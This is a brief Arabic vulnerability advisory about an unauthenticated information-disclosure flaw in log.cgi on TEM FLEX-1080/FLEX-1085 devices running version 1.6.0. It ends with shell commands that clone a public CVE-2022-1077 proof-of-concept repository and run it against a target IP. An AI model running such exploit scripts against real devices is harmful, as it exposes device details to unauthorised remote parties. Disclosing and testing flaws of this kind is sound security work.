
TEM FLEX-1080/FLEX-1085 1.6.0 log log.cgi كشف المعلومات
تم العثور على ثغرة أمنية في TEM FLEX-1080 وFLEX-1085 الإصدار 1.6.0، وقد تم تصنيفها على أنها إشكالية. تتعلق هذه الثغرة بملف log.cgi من مكوّن Log Handler. يؤدي إرسال طلب مباشر إلى كشف معلومات عن عتاد الجهاز. يمكن بدء الهجوم عن بُعد ولا يتطلب أي شكل من أشكال المصادقة.

$ git clone https://github.com/Brosck/CVE-2022-1077.git
$ cd CVE-2022-1077
$ chmod +x cve-2022-1077.py
$ ./cve-2022-1077.py -u http://<IP>